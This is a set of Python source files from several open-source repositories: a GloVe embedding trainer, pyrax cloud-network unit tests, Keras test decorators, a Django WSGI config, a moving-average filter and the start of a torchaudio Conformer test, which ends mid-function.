# b -= learning_rate*reg*b
# print "updated b"
# update U
for j in range(V):
# for i in range(V):
# U[j] -= learning_rate*fX[i,j]*(W[i].dot(U[j]) + b[i] + c[j] + mu - logX[i,j])*W[i]
U[j] -= learning_rate*(fX[:,j]*delta[:,j]).dot(W)
U -= learning_rate*reg*U
# print "updated U"
# update c
for j in range(V):
# for i in range(V):
# c[j] -= learning_rate*fX[i,j]*(W[i].dot(U[j]) + b[i] + c[j] + mu - logX[i,j])
c[j] -= learning_rate*fX[:,j].dot(delta[:,j])
# c -= learning_rate*reg*c
# print "updated c"
else:
# ALS method
# update W
# fast way
# t0 = datetime.now()
for i in range(V):
# matrix = reg*np.eye(D) + np.sum((fX[i,j]*np.outer(U[j], U[j]) for j in range(V)), axis=0)
matrix = reg*np.eye(D) + (fX[i,:]*U.T).dot(U)
# assert(np.abs(matrix - matrix2).sum() < 1e-5)
vector = (fX[i,:]*(logX[i,:] - b[i] - c - mu)).dot(U)
W[i] = np.linalg.solve(matrix, vector)
# print "fast way took:", (datetime.now() - t0)
# slow way
# t0 = datetime.now()
# for i in range(V):
# matrix2 = reg*np.eye(D)
# vector2 = 0
# for j in range(V):
# matrix2 += fX[i,j]*np.outer(U[j], U[j])
# vector2 += fX[i,j]*(logX[i,j] - b[i] - c[j])*U[j]
# print "slow way took:", (datetime.now() - t0)
# assert(np.abs(matrix - matrix2).sum() < 1e-5)
# assert(np.abs(vector - vector2).sum() < 1e-5)
# W[i] = np.linalg.solve(matrix, vector)
# print "updated W"
# update b
for i in range(V):
denominator = fX[i,:].sum() + reg
# assert(denominator > 0)
numerator = fX[i,:].dot(logX[i,:] - W[i].dot(U.T) - c - mu)
# for j in range(V):
# numerator += fX[i,j]*(logX[i,j] - W[i].dot(U[j]) - c[j])
b[i] = numerator / denominator
# print "updated b"
# update U
for j in range(V):
# matrix = reg*np.eye(D) + np.sum((fX[i,j]*np.outer(W[i], W[i]) for i in range(V)), axis=0)
matrix = reg*np.eye(D) + (fX[:,j]*W.T).dot(W)
# assert(np.abs(matrix - matrix2).sum() < 1e-8)
vector = (fX[:,j]*(logX[:,j] - b - c[j] - mu)).dot(W)
# matrix = reg*np.eye(D)
# vector = 0
# for i in range(V):
# matrix += fX[i,j]*np.outer(W[i], W[i])
# vector += fX[i,j]*(logX[i,j] - b[i] - c[j])*W[i]
U[j] = np.linalg.solve(matrix, vector)
# print "updated U"
# update c
for j in range(V):
denominator = fX[:,j].sum() + reg
numerator = fX[:,j].dot(logX[:,j] - W.dot(U[j]) - b - mu)
# for i in range(V):
# numerator += fX[i,j]*(logX[i,j] - W[i].dot(U[j]) - b[i])
c[j] = numerator / denominator
# print "updated c"
self.W = W
self.U = U
plt.plot(costs)
plt.show()
def save(self, fn):
# function word_analogies expects a (V,D) matrix and a (D,V) matrix
arrays = [self.W, self.U.T]
np.savez(fn, *arrays)
def main(we_file, w2i_file, use_brown=True, n_files=100):
if use_brown:
cc_matrix = "cc_matrix_brown.npy"
else:
cc_matrix = "cc_matrix_%s.npy" % n_files
# hacky way of checking if we need to re-load the raw data or not
# remember, only the co-occurrence matrix is needed for training
if os.path.exists(cc_matrix):
with open(w2i_file) as f:
word2idx = json.load(f)
sentences = [] # dummy - we won't actually use it
else:
if use_brown:
keep_words = set([
'king', 'man', 'woman',
'france', 'paris', 'london', 'rome', 'italy', 'britain', 'england',
'french', 'english', 'japan', 'japanese', 'chinese', 'italian',
'australia', 'australian', 'december', 'november', 'june',
'january', 'february', 'march', 'april', 'may', 'july', 'august',
'september', 'october',
])
sentences, word2idx = get_sentences_with_word2idx_limit_vocab(n_vocab=5000, keep_words=keep_words)
else:
sentences, word2idx = get_wikipedia_data(n_files=n_files, n_vocab=2000)
with open(w2i_file, 'w') as f:
json.dump(word2idx, f)
V = len(word2idx)
model = Glove(100, V, 10)
# alternating least squares method
model.fit(sentences, cc_matrix=cc_matrix, epochs=20)
# gradient descent method
# model.fit(
# sentences,
# cc_matrix=cc_matrix,
# learning_rate=5e-4,
# reg=0.1,
# epochs=500,
# gd=True,
# )
model.save(we_file)
if __name__ == '__main__':
we = 'glove_model_50.npz'
w2i = 'glove_word2idx_50.json'
# we = 'glove_model_brown.npz'
# w2i = 'glove_word2idx_brown.json'
main(we, w2i, use_brown=False)
# load back embeddings
npz = np.load(we)
W1 = npz['arr_0']
W2 = npz['arr_1']
with open(w2i) as f:
word2idx = json.load(f)
idx2word = {i:w for w,i in word2idx.items()}
for concat in (True, False):
print("** concat:", concat)
if concat:
We = np.hstack([W1, W2.T])
else:
We = (W1 + W2.T) / 2
find_analogies('king', 'man', 'woman', We, word2idx, idx2word)
find_analogies('france', 'paris', 'london', We, word2idx, idx2word)
find_analogies('france', 'paris', 'rome', We, word2idx, idx2word)
find_analogies('paris', 'france', 'italy', We, word2idx, idx2word)
find_analogies('france', 'french', 'english', We, word2idx, idx2word)
find_analogies('japan', 'japanese', 'chinese', We, word2idx, idx2word)
find_analogies('japan', 'japanese', 'italian', We, word2idx, idx2word)
find_analogies('japan', 'japanese', 'australian', We, word2idx, idx2word)
find_analogies('december', 'november', 'june', We, word2idx, idx2word)
avg_line_length: 37.439252 | max_line_length: 117 | alphanum_fraction: 0.473124

hexsha: 1524cd0617f8535fc5c9386207486ce54a8ef2f1 | size: 7,332 | ext: py | lang: Python
max_stars:  path tests/unit/test_cloud_networks.py | repo HQJaTu/pyrax | head 868f49527cd5e9161590eabd1144a6fcc02a7985 | licenses ["Apache-2.0"] | count null | event min null | event max null
max_issues: path tests/unit/test_cloud_networks.py | repo HQJaTu/pyrax | head 868f49527cd5e9161590eabd1144a6fcc02a7985 | licenses ["Apache-2.0"] | count null | event min null | event max null
max_forks:  path tests/unit/test_cloud_networks.py | repo HQJaTu/pyrax | head 868f49527cd5e9161590eabd1144a6fcc02a7985 | licenses ["Apache-2.0"] | count null | event min null | event max null
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import unittest
from mock import patch
from mock import MagicMock as Mock
import pyrax.cloudnetworks
from pyrax.cloudnetworks import CloudNetwork
from pyrax.cloudnetworks import CloudNetworkManager
from pyrax.cloudnetworks import CloudNetworkClient
from pyrax.cloudnetworks import _get_server_networks
import pyrax.exceptions as exc
import pyrax.utils as utils
from pyrax import fakes
example_cidr = "1.1.1.0/8"
example_uri = "http://example.com"
class CloudNetworksTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(CloudNetworksTest, self).__init__(*args, **kwargs)
def setUp(self):
self.client = fakes.FakeCloudNetworkClient()
def tearDown(self):
self.client = None
def test_get_types(self):
iso_network = fakes.FakeCloudNetwork()
svc_network = fakes.FakeCloudNetwork()
svc_network.id = pyrax.cloudnetworks.SERVICE_NET_ID
sav_get = pyrax.resource.BaseResource.get
pyrax.resource.BaseResource.get = Mock()
iso_network.get()
pyrax.resource.BaseResource.get.assert_called_once_with()
svc_network.get()
pyrax.resource.BaseResource.get.assert_called_once_with()
pyrax.resource.BaseResource.get = sav_get
def test_get_server_networks(self):
clt = self.client
iso_network = fakes.FakeCloudNetwork()
iso_id = iso_network.id
exp = [{"net-id": iso_id}, {"net-id": clt.PUBLIC_NET_ID},
{"net-id": clt.SERVICE_NET_ID}]
ret = _get_server_networks(iso_network, public=True, private=True)
self.assertEqual(ret, exp)
def test_get_server_networks_by_client(self):
clt = self.client
iso_network = fakes.FakeCloudNetwork()
iso_id = iso_network.id
ret = clt.get_server_networks(iso_network)
self.assertEqual(ret, [{"net-id": iso_id}])
ret = clt.get_server_networks(iso_network, private=True)
self.assertEqual(ret, [{"net-id": iso_id},
{"net-id": clt.SERVICE_NET_ID}])
def test_get_server_networks_by_network(self):
clt = self.client
iso_network = fakes.FakeCloudNetwork()
iso_id = iso_network.id
ret = iso_network.get_server_networks()
self.assertEqual(ret, [{"net-id": iso_id}])
ret = iso_network.get_server_networks(private=True)
self.assertEqual(ret, [{"net-id": iso_id},
{"net-id": clt.SERVICE_NET_ID}])
def test_create_manager(self):
clt = self.client
self.assertTrue(isinstance(clt._manager, CloudNetworkManager))
def test_create_body(self):
mgr = self.client._manager
nm = utils.random_unicode()
expected = {"network": {"label": nm, "cidr": example_cidr}}
returned = mgr._create_body(name=nm, cidr=example_cidr)
self.assertEqual(expected, returned)
def test_create(self):
clt = self.client
clt._manager.create = Mock(return_value=fakes.FakeCloudNetwork())
nm = utils.random_unicode()
new = clt.create(label=nm, cidr=example_cidr)
clt._manager.create.assert_called_once_with(label=nm, name=None,
cidr=example_cidr)
def test_create_fail_count(self):
clt = self.client
err = exc.BadRequest(400)
err.message = "Request failed: too many networks."
clt._manager.create = Mock(side_effect=err)
nm = utils.random_unicode()
self.assertRaises(exc.NetworkCountExceeded, clt.create, label=nm,
cidr=example_cidr)
def test_create_fail_cidr(self):
clt = self.client
err = exc.BadRequest(400)
err.message = "CIDR does not contain enough addresses."
clt._manager.create = Mock(side_effect=err)
nm = utils.random_unicode()
self.assertRaises(exc.NetworkCIDRInvalid, clt.create, label=nm,
cidr=example_cidr)
def test_create_fail_cidr_malformed(self):
clt = self.client
err = exc.BadRequest(400)
err.message = "CIDR is malformed."
clt._manager.create = Mock(side_effect=err)
nm = utils.random_unicode()
self.assertRaises(exc.NetworkCIDRMalformed, clt.create, label=nm,
cidr=example_cidr)
def test_create_fail_other(self):
clt = self.client
err = exc.BadRequest(400)
err.message = "Something strange happened."
clt._manager.create = Mock(side_effect=err)
nm = utils.random_unicode()
self.assertRaises(exc.BadRequest, clt.create, label=nm,
cidr=example_cidr)
def test_find_network_by_label(self):
clt = self.client
net1 = fakes.FakeCloudNetwork(name="First")
net2 = fakes.FakeCloudNetwork(name="Second")
net3 = fakes.FakeCloudNetwork(name="Third")
clt.list = Mock(return_value=[net1, net2, net3])
found = clt.find_network_by_label("Third")
self.assertEqual(found, net3)
def test_find_network_by_label_missing(self):
clt = self.client
net1 = fakes.FakeCloudNetwork(name="First")
net2 = fakes.FakeCloudNetwork(name="Second")
net3 = fakes.FakeCloudNetwork(name="Third")
clt.list = Mock(return_value=[net1, net2, net3])
self.assertRaises(exc.NetworkNotFound, clt.find_network_by_label,
"Fourth")
def test_find_network_by_label_multiple(self):
clt = self.client
net1 = fakes.FakeCloudNetwork(name="First")
net2 = fakes.FakeCloudNetwork(name="Third")
net3 = fakes.FakeCloudNetwork(name="Third")
clt.list = Mock(return_value=[net1, net2, net3])
self.assertRaises(exc.NetworkLabelNotUnique, clt.find_network_by_label,
"Third")
def test_network_name(self):
clt = self.client
nm = "fake"
net = fakes.FakeCloudNetwork(name=nm)
self.assertEqual(net.label, nm)
self.assertEqual(net.name, nm)
net.name = "faker"
self.assertEqual(net.name, net.label)
def test_delete_network(self):
clt = self.client
nm = "fake"
net = fakes.FakeCloudNetwork(name=nm)
net.manager = fakes.FakeManager()
net.manager.delete = Mock()
net.delete()
net.manager.delete.assert_called_once_with(net)
def test_delete_network_by_client(self):
clt = self.client
nm = "fake"
net = fakes.FakeCloudNetwork(name=nm)
clt.method_delete = Mock(return_value=(None, None))
clt.delete(net)
clt.method_delete.assert_called_once_with("/os-networksv2/%s" % net.id)
def test_delete_network_fail(self):
clt = self.client
nm = "fake"
net = fakes.FakeCloudNetwork(name=nm)
net.manager = fakes.FakeManager()
err = exc.Forbidden(403)
net.manager.delete = Mock(side_effect=err)
self.assertRaises(exc.NetworkInUse, net.delete)
def test_delete_network_by_client_fail(self):
clt = self.client
nm = "fake"
net = fakes.FakeCloudNetwork(name=nm)
err = exc.Forbidden(403)
clt.method_delete = Mock(side_effect=err)
self.assertRaises(exc.NetworkInUse, clt.delete, net)
if __name__ == "__main__":
unittest.main()
avg_line_length: 35.941176 | max_line_length: 79 | alphanum_fraction: 0.653983

hexsha: 49e8809a3ff7f5dc3033ca8d2c4d566b13a666f1 | size: 18,265 | ext: py | lang: Python
max_stars:  path keras/keras_parameterized.py | repo winnerineast/keras | head 1e94c43d7ba0d7b6b629b2300e40470f495bdbe0 | licenses ["Apache-2.0"] | count 1 | event min 2021-01-01T00:16:04.000Z | event max 2021-01-01T00:16:04.000Z
max_issues: path keras/keras_parameterized.py | repo winnerineast/keras | head 1e94c43d7ba0d7b6b629b2300e40470f495bdbe0 | licenses ["Apache-2.0"] | count 1 | event min 2021-01-10T15:10:05.000Z | event max 2021-01-25T09:19:15.000Z
max_forks:  path keras/keras_parameterized.py | repo winnerineast/keras | head 1e94c43d7ba0d7b6b629b2300e40470f495bdbe0 | licenses ["Apache-2.0"] | count 1 | event min 2021-01-10T09:06:39.000Z | event max 2021-01-10T09:06:39.000Z
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for unit-testing Keras."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import collections.abc as collections_abc
import functools
import itertools
import unittest
from absl.testing import parameterized
import keras
from keras import testing_utils
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestCase(tf.test.TestCase, parameterized.TestCase):
def tearDown(self):
keras.backend.clear_session()
super(TestCase, self).tearDown()
def run_with_all_saved_model_formats(
test_or_class=None,
exclude_formats=None):
"""Execute the decorated test with all Keras saved model formats).
This decorator is intended to be applied either to individual test methods in
a `keras_parameterized.TestCase` class, or directly to a test class that
extends it. Doing so will cause the contents of the individual test
method (or all test methods in the class) to be executed multiple times - once
for each Keras saved model format.
The Keras saved model formats include:
1. HDF5: 'h5'
2. SavedModel: 'tf'
Note: if stacking this decorator with absl.testing's parameterized decorators,
those should be at the bottom of the stack.
Various methods in `testing_utils` to get file path for saved models will
auto-generate a string of the two saved model formats. This allows unittests
to confirm the equivalence between the two Keras saved model formats.
For example, consider the following unittest:
```python
class MyTests(testing_utils.KerasTestCase):
@testing_utils.run_with_all_saved_model_formats
def test_foo(self):
save_format = testing_utils.get_save_format()
saved_model_dir = '/tmp/saved_model/'
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(saved_model_dir)
if __name__ == "__main__":
tf.test.main()
```
This test tries to save the model into both supported formats, 'h5' and 'tf'.
We can also annotate the whole class if we want this to apply to all tests in
the class:
```python
@testing_utils.run_with_all_saved_model_formats
class MyTests(testing_utils.KerasTestCase):
def test_foo(self):
save_format = testing_utils.get_save_format()
saved_model_dir = '/tmp/saved_model/'
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = tf.keras.models.load_model(saved_model_dir)
if __name__ == "__main__":
tf.test.main()
```
Args:
test_or_class: test method or class to be annotated. If None,
this method returns a decorator that can be applied to a test method or
test class. If it is not None this returns the decorator applied to the
test or class.
exclude_formats: A collection of Keras saved model formats to not run.
(May also be a single format not wrapped in a collection).
Defaults to None.
Returns:
Returns a decorator that will run the decorated test method multiple times:
once for each desired Keras saved model format.
Raises:
ImportError: If abseil parameterized is not installed or not included as
a target dependency.
"""
# Exclude the h5 save format if h5py isn't available.
exclude_formats = exclude_formats or []
if h5py is None:
  exclude_formats.append('h5')
saved_model_formats = ['h5', 'tf', 'tf_no_traces']
params = [('_%s' % saved_format, saved_format)
for saved_format in saved_model_formats
if saved_format not in tf.nest.flatten(exclude_formats)]
def single_method_decorator(f):
"""Decorator that constructs the test cases."""
# Use named_parameters so it can be individually run from the command line
@parameterized.named_parameters(*params)
@functools.wraps(f)
def decorated(self, saved_format, *args, **kwargs):
"""A run of a single test case w/ the specified model type."""
if saved_format == 'h5':
_test_h5_saved_model_format(f, self, *args, **kwargs)
elif saved_format == 'tf':
_test_tf_saved_model_format(f, self, *args, **kwargs)
elif saved_format == 'tf_no_traces':
_test_tf_saved_model_format_no_traces(f, self, *args, **kwargs)
else:
raise ValueError('Unknown save format: %s' % (saved_format,))
return decorated
return _test_or_class_decorator(test_or_class, single_method_decorator)
def _test_h5_saved_model_format(f, test_or_class, *args, **kwargs):
with testing_utils.saved_model_format_scope('h5'):
f(test_or_class, *args, **kwargs)
def _test_tf_saved_model_format(f, test_or_class, *args, **kwargs):
with testing_utils.saved_model_format_scope('tf'):
f(test_or_class, *args, **kwargs)
def _test_tf_saved_model_format_no_traces(f, test_or_class, *args, **kwargs):
with testing_utils.saved_model_format_scope('tf', save_traces=False):
f(test_or_class, *args, **kwargs)
def run_with_all_weight_formats(test_or_class=None, exclude_formats=None):
"""Runs all tests with the supported formats for saving weights."""
exclude_formats = exclude_formats or []
exclude_formats.append('tf_no_traces') # Only applies to saving models
return run_with_all_saved_model_formats(test_or_class, exclude_formats)
# TODO(kaftan): Possibly enable 'subclass_custom_build' when tests begin to pass
# it. Or perhaps make 'subclass' always use a custom build method.
def run_with_all_model_types(
test_or_class=None,
exclude_models=None):
"""Execute the decorated test with all Keras model types.
This decorator is intended to be applied either to individual test methods in
a `keras_parameterized.TestCase` class, or directly to a test class that
extends it. Doing so will cause the contents of the individual test
method (or all test methods in the class) to be executed multiple times - once
for each Keras model type.
The Keras model types are: ['functional', 'subclass', 'sequential']
Note: if stacking this decorator with absl.testing's parameterized decorators,
those should be at the bottom of the stack.
Various methods in `testing_utils` to get models will auto-generate a model
of the currently active Keras model type. This allows unittests to confirm
the equivalence between different Keras models.
For example, consider the following unittest:
```python
class MyTests(testing_utils.KerasTestCase):
@testing_utils.run_with_all_model_types(
exclude_models = ['sequential'])
def test_foo(self):
model = testing_utils.get_small_mlp(1, 4, input_dim=3)
optimizer = RMSPropOptimizer(learning_rate=0.001)
loss = 'mse'
metrics = ['mae']
model.compile(optimizer, loss, metrics=metrics)
inputs = np.zeros((10, 3))
targets = np.zeros((10, 4))
dataset = dataset_ops.Dataset.from_tensor_slices((inputs, targets))
dataset = dataset.repeat(100)
dataset = dataset.batch(10)
model.fit(dataset, epochs=1, steps_per_epoch=2, verbose=1)
if __name__ == "__main__":
tf.test.main()
```
This test tries building a small mlp as both a functional model and as a
subclass model.
We can also annotate the whole class if we want this to apply to all tests in
the class:
```python
@testing_utils.run_with_all_model_types(exclude_models = ['sequential'])
class MyTests(testing_utils.KerasTestCase):
def test_foo(self):
model = testing_utils.get_small_mlp(1, 4, input_dim=3)
optimizer = RMSPropOptimizer(learning_rate=0.001)
loss = 'mse'
metrics = ['mae']
model.compile(optimizer, loss, metrics=metrics)
inputs = np.zeros((10, 3))
targets = np.zeros((10, 4))
dataset = dataset_ops.Dataset.from_tensor_slices((inputs, targets))
dataset = dataset.repeat(100)
dataset = dataset.batch(10)
model.fit(dataset, epochs=1, steps_per_epoch=2, verbose=1)
if __name__ == "__main__":
tf.test.main()
```
Args:
test_or_class: test method or class to be annotated. If None,
this method returns a decorator that can be applied to a test method or
test class. If it is not None this returns the decorator applied to the
test or class.
exclude_models: A collection of Keras model types to not run.
(May also be a single model type not wrapped in a collection).
Defaults to None.
Returns:
Returns a decorator that will run the decorated test method multiple times:
once for each desired Keras model type.
Raises:
ImportError: If abseil parameterized is not installed or not included as
a target dependency.
"""
model_types = ['functional', 'subclass', 'sequential']
params = [('_%s' % model, model) for model in model_types
if model not in tf.nest.flatten(exclude_models)]
def single_method_decorator(f):
"""Decorator that constructs the test cases."""
# Use named_parameters so it can be individually run from the command line
@parameterized.named_parameters(*params)
@functools.wraps(f)
def decorated(self, model_type, *args, **kwargs):
"""A run of a single test case w/ the specified model type."""
if model_type == 'functional':
_test_functional_model_type(f, self, *args, **kwargs)
elif model_type == 'subclass':
_test_subclass_model_type(f, self, *args, **kwargs)
elif model_type == 'sequential':
_test_sequential_model_type(f, self, *args, **kwargs)
else:
raise ValueError('Unknown model type: %s' % (model_type,))
return decorated
return _test_or_class_decorator(test_or_class, single_method_decorator)
def _test_functional_model_type(f, test_or_class, *args, **kwargs):
with testing_utils.model_type_scope('functional'):
f(test_or_class, *args, **kwargs)
def _test_subclass_model_type(f, test_or_class, *args, **kwargs):
with testing_utils.model_type_scope('subclass'):
f(test_or_class, *args, **kwargs)
def _test_sequential_model_type(f, test_or_class, *args, **kwargs):
with testing_utils.model_type_scope('sequential'):
f(test_or_class, *args, **kwargs)
def run_all_keras_modes(test_or_class=None,
config=None,
always_skip_v1=False,
always_skip_eager=False,
**kwargs):
"""Execute the decorated test with all keras execution modes.
This decorator is intended to be applied either to individual test methods in
a `keras_parameterized.TestCase` class, or directly to a test class that
extends it. Doing so will cause the contents of the individual test
method (or all test methods in the class) to be executed multiple times -
once executing in legacy graph mode, once running eagerly and with
`should_run_eagerly` returning True, and once running eagerly with
`should_run_eagerly` returning False.
If Tensorflow v2 behavior is enabled, legacy graph mode will be skipped, and
the test will only run twice.
Note: if stacking this decorator with absl.testing's parameterized decorators,
those should be at the bottom of the stack.
For example, consider the following unittest:
```python
class MyTests(testing_utils.KerasTestCase):
@testing_utils.run_all_keras_modes
def test_foo(self):
model = testing_utils.get_small_functional_mlp(1, 4, input_dim=3)
optimizer = RMSPropOptimizer(learning_rate=0.001)
loss = 'mse'
metrics = ['mae']
model.compile(
optimizer, loss, metrics=metrics,
run_eagerly=testing_utils.should_run_eagerly())
inputs = np.zeros((10, 3))
targets = np.zeros((10, 4))
dataset = dataset_ops.Dataset.from_tensor_slices((inputs, targets))
dataset = dataset.repeat(100)
dataset = dataset.batch(10)
model.fit(dataset, epochs=1, steps_per_epoch=2, verbose=1)
if __name__ == "__main__":
tf.test.main()
```
This test will try compiling & fitting the small functional mlp using all
three Keras execution modes.
Args:
test_or_class: test method or class to be annotated. If None,
this method returns a decorator that can be applied to a test method or
test class. If it is not None this returns the decorator applied to the
test or class.
config: An optional config_pb2.ConfigProto to use to configure the
session when executing graphs.
always_skip_v1: If True, does not try running the legacy graph mode even
when Tensorflow v2 behavior is not enabled.
always_skip_eager: If True, does not execute the decorated test
with eager execution modes.
**kwargs: Additional kwargs for configuring tests for
in-progress Keras behaviors/ refactorings that we haven't fully
rolled out yet
Returns:
Returns a decorator that will run the decorated test method multiple times.
Raises:
ImportError: If abseil parameterized is not installed or not included as
a target dependency.
"""
skip_keras_tensors = kwargs.pop('skip_keras_tensors', False)
if kwargs:
raise ValueError('Unrecognized keyword args: {}'.format(kwargs))
params = [('_v2_function', 'v2_function')]
if not skip_keras_tensors:
params.append(('_v2_function_use_keras_tensors',
'v2_function_use_keras_tensors'))
if not always_skip_eager:
params.append(('_v2_eager', 'v2_eager'))
if not (always_skip_v1 or tf.__internal__.tf2.enabled()):
params.append(('_v1_session', 'v1_session'))
def single_method_decorator(f):
"""Decorator that constructs the test cases."""
# Use named_parameters so it can be individually run from the command line
@parameterized.named_parameters(*params)
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
"""A run of a single test case w/ specified run mode."""
if run_mode == 'v1_session':
_v1_session_test(f, self, config, *args, **kwargs)
elif run_mode == 'v2_eager':
_v2_eager_test(f, self, *args, **kwargs)
elif run_mode == 'v2_function':
_v2_function_test(f, self, *args, **kwargs)
elif run_mode == 'v2_function_use_keras_tensors':
_v2_function_and_kerastensors_test(f, self, *args, **kwargs)
else:
raise ValueError('Unknown run mode %s' % run_mode)
return decorated
return _test_or_class_decorator(test_or_class, single_method_decorator)
def _v1_session_test(f, test_or_class, config, *args, **kwargs):
with tf.compat.v1.get_default_graph().as_default():
with testing_utils.run_eagerly_scope(False):
with test_or_class.test_session(use_gpu=True, config=config):
f(test_or_class, *args, **kwargs)
def _v2_eager_test(f, test_or_class, *args, **kwargs):
with tf.__internal__.eager_context.eager_mode():
with testing_utils.run_eagerly_scope(True):
f(test_or_class, *args, **kwargs)
def _v2_function_test(f, test_or_class, *args, **kwargs):
with tf.__internal__.eager_context.eager_mode():
with testing_utils.run_eagerly_scope(False):
f(test_or_class, *args, **kwargs)
def _v2_function_and_kerastensors_test(f, test_or_class, *args, **kwargs):
with tf.__internal__.eager_context.eager_mode():
with testing_utils.run_eagerly_scope(False):
with testing_utils.use_keras_tensors_scope(True):
f(test_or_class, *args, **kwargs)
def _test_or_class_decorator(test_or_class, single_method_decorator):
"""Decorate a test or class with a decorator intended for one method.
If the test_or_class is a class:
This will apply the decorator to all test methods in the class.
If the test_or_class is an iterable of already-parameterized test cases:
This will apply the decorator to all the cases, and then flatten the
resulting cross-product of test cases. This allows stacking the Keras
parameterized decorators w/ each other, and to apply them to test methods
that have already been marked with an absl parameterized decorator.
Otherwise, treat the obj as a single method and apply the decorator directly.
Args:
test_or_class: A test method (that may have already been decorated with a
parameterized decorator, or a test class that extends
keras_parameterized.TestCase
single_method_decorator:
A parameterized decorator intended for a single test method.
Returns:
The decorated result.
"""
def _decorate_test_or_class(obj):
if isinstance(obj, collections_abc.Iterable):
return itertools.chain.from_iterable(
single_method_decorator(method) for method in obj)
if isinstance(obj, type):
cls = obj
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith(
unittest.TestLoader.testMethodPrefix):
setattr(cls, name, single_method_decorator(value))
cls = type(cls).__new__(type(cls), cls.__name__, cls.__bases__,
cls.__dict__.copy())
return cls
return single_method_decorator(obj)
if test_or_class is not None:
return _decorate_test_or_class(test_or_class)
return _decorate_test_or_class
avg_line_length: 37.048682 | max_line_length: 80 | alphanum_fraction: 0.717054

hexsha: 942ea4433d99790198dab89da80356c6c82d6944 | size: 396 | ext: py | lang: Python
max_stars:  path DjangoApp/wsgi.py | repo johnnynode/Django-demo | head 421f4d23d2773a1338a5163605a2f29202c91396 | licenses ["MIT"] | count 2 | event min 2018-08-18T15:14:45.000Z | event max 2019-10-16T16:14:13.000Z
max_issues: path DjangoApp/wsgi.py | repo johnnynode/Django-demo | head 421f4d23d2773a1338a5163605a2f29202c91396 | licenses ["MIT"] | count null | event min null | event max null
max_forks:  path DjangoApp/wsgi.py | repo johnnynode/Django-demo | head 421f4d23d2773a1338a5163605a2f29202c91396 | licenses ["MIT"] | count 6 | event min 2018-05-05T18:13:05.000Z | event max 2021-05-20T11:32:48.000Z
"""
WSGI config for DjangoApp project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "DjangoApp.settings")
application = get_wsgi_application()
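# Editor's note (not part of the original file): a WSGI server is typically
# pointed at this module, e.g. `gunicorn DjangoApp.wsgi:application`.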
avg_line_length: 23.294118 | max_line_length: 78 | alphanum_fraction: 0.787879

hexsha: 92b1f01c5dd17bdd04cec478f48a6265a0757fc4 | size: 561 | ext: py | lang: Python
max_stars:  path dsptools/filters/cumulative_moving_average.py | repo jamlamberti/dsp-tools | head 490bc50a497a3a7be85d48b29a8bb3d74ca7f5e8 | licenses ["MIT"] | count null | event min null | event max null
max_issues: path dsptools/filters/cumulative_moving_average.py | repo jamlamberti/dsp-tools | head 490bc50a497a3a7be85d48b29a8bb3d74ca7f5e8 | licenses ["MIT"] | count 2 | event min 2019-10-11T03:54:35.000Z | event max 2019-10-30T00:27:45.000Z
max_forks:  path dsptools/filters/cumulative_moving_average.py | repo jamlamberti/dsp-tools | head 490bc50a497a3a7be85d48b29a8bb3d74ca7f5e8 | licenses ["MIT"] | count null | event min null | event max null
from ..signal_generators.base_generator import BaseGenerator
class CumulativeMovingAverage(BaseGenerator):
def __init__(self, generator):
super(CumulativeMovingAverage, self).__init__()
self._generator = generator
self._cntr = 0
self._cma = 0.
def next_value(self):
    # Incremental form of the cumulative moving average:
    #   CMA_n = CMA_{n-1} + (x_n - CMA_{n-1}) / n
    self._cntr += 1
    delta = float(self._generator.next_value()) - self._cma
    self._cma += delta / self._cntr
    return self._cma
def rewind(self):
self._cntr = 0
self._cma = 0.
self._generator.rewind()
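# Editor's sketch (not part of the original file): usage assumes any generator
# exposing next_value()/rewind(); `SomeGenerator` below is hypothetical.
#
#   gen = SomeGenerator()
#   cma = CumulativeMovingAverage(gen)
#   smoothed = [cma.next_value() for _ in range(100)]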
avg_line_length: 26.714286 | max_line_length: 68 | alphanum_fraction: 0.634581

hexsha: bda9b2264d8cff2e3b2566724a3027f99b16b475 | size: 1,726 | ext: py | lang: Python
max_stars:  path test/torchaudio_unittest/prototype/conformer_test_impl.py | repo popcornell/audio | head 7b6b2d000023e2aa3365b769866c5f375e0d5fda | licenses ["BSD-2-Clause"] | count null | event min null | event max null
max_issues: path test/torchaudio_unittest/prototype/conformer_test_impl.py | repo popcornell/audio | head 7b6b2d000023e2aa3365b769866c5f375e0d5fda | licenses ["BSD-2-Clause"] | count 1 | event min 2021-09-07T15:42:33.000Z | event max 2021-09-14T21:39:04.000Z
max_forks:  path test/torchaudio_unittest/prototype/conformer_test_impl.py | repo popcornell/audio | head 7b6b2d000023e2aa3365b769866c5f375e0d5fda | licenses ["BSD-2-Clause"] | count null | event min null | event max null
import torch
from torchaudio.prototype.models import Conformer
from torchaudio_unittest.common_utils import TestBaseMixin, torch_script
class ConformerTestImpl(TestBaseMixin):
def _gen_model(self):
conformer = (
Conformer(
num_layers=4,
input_dim=80,
conv_channels=64,
conformer_layer_input_dim=256,
conv_kernel_sizes=[5, 5],
max_source_positions=6000,
ffn_dim=128,
num_attention_heads=4,
depthwise_conv_kernel_size=31,
dropout=0.1,
)
.to(device=self.device, dtype=self.dtype)
